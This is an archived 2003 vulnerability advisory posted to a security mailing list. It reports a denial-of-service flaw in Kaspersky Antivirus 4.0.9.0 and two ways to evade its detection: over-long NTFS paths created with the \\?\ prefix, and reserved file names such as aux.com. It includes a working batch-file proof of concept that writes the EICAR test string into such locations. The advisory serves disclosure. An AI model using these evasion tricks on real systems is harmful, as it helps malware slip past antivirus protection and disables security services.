SECURITY.NNOV: Kaspersky Antivirus DoS

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 11 2003 - 02:09:58 PST

Next message: Damir Rajnovic: "Field Notice - IOS Accepts ICMP Redirects in Non-default Configuration Settings"

Previous message: Martin Schulze: "[SECURITY] [DSA 249-1] New w3mmee packages fix cookie information leak"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Title:                     Kaspersky Antivirus DoS
Affected:                  Kaspersky  Antivirus 4.0.9.0
                           (Server and Workstation version on
                           Windows NT 4.0 and Windows 2000).
Author:                    ZARAZA <3APA3Aat_private>
Vendor:                    Kaspersky Lab
Date:                      January, 30 2003
Risk:                      Average
Exploitable:               Yes
Remote:                    Yes (for server versions)
Vendor Notified:           January, 30 2003

I. Introduction:

Kaspersky   Antivirus   (KAV)   is  a  family  of  antiviral  products.

II. Vulnerability:

Few  vulnerabilities  were identified. Most serious allows user to crash
antiviral  server  remotely  (write  access  to  any directory on remote
server is required).

1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection

III. Details:

1. Long path crash

NTFS  file system allows to create paths of almost unlimited length. But
Windows  API  does  not  allow  path  longer  than 256 bytes. To prevent
Windows  API  from  checking  requested  path \\?\ prefix may be used to
filename.  This  is documented feature of Windows API. Paths longer than
256 characters will cause KAV monitor service to crash or hang with 100%
CPU usage. Possibility of code execution is not researched.

2. Long path prevents malware from detection

Long path will also prevent malware from detection by antiviral scanner.


3. Special name prevents malware from detection

It's  possible  to  create  NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.

IV. Exploit:

This .bat file demonstrates vulnerability.

1,2 Long path crash & Long path prevents malware from detection

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

3. Special name prevents malware from detection

echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com


V. Vendor

No response from vendor.

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

Next message: Damir Rajnovic: "Field Notice - IOS Accepts ICMP Redirects in Non-default Configuration Settings"
Previous message: Martin Schulze: "[SECURITY] [DSA 249-1] New w3mmee packages fix cookie information leak"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 11 2003 - 06:43:40 PST